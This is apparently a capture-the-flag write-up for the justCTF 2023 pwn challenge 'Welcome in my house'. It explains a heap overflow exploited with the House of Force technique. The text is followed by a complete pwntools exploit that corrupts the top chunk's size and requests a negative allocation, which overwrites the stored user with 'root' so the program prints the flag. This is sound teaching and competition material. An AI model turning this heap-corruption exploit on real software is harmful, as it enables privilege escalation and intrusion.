justctf 2023 pwn Welcome in my house
Heap overflow, and an allocation of arbitrary size can be requested, so House of Force can be used.
To get the flag the user has to be root. The user defaults to admin and is stored in a heap chunk, but with House of Force an allocation can be made that lands on the chunk holding the user, so it can be changed to root; choosing option 2 then prints the flag.
from pwn import *

context(arch='amd64', os='linux', log_level='debug')
file_name = './house'
# coloured print helpers (orange / red)
li = lambda x: print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')
ll = lambda x: print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')
context.terminal = ['tmux', 'splitw', '-h']

debug = 0
if debug:
    r = remote()  # remote host and port are not given in the writeup; fill in before use
else:
    r = process(file_name)
elf = ELF(file_name)

def dbg():
    gdb.attach(r)

def dbgg():
    # pause so a debugger can be attached (Python 3: input(), not raw_input())
    input()

menu = '>> '
dbgg()

# Option 1: set username and password. The password overflows its chunk:
# after the 0x10-byte string come prev_size (0) and the top chunk's size field,
# which is overwritten with 0xFFFFFFFFFFFFFFFF (House of Force).
r.sendlineafter(menu, '1')
r.sendlineafter('Enter username: ', 'z1r0')
p1 = b'root'.ljust(0x10, b'\x00') + p64(0) + p64(0xFFFFFFFFFFFFFFFF)
r.sendlineafter('Enter password: ', p1)
# Negative "disk space" request moves the top chunk backwards onto the chunk
# that stores the user, so it ends up reading as "root".
r.sendlineafter('Enter disk space: \n', str(-0xa0))
# Option 2: the user is now root, so this prints the flag.
r.sendlineafter(menu, '2')
r.interactive()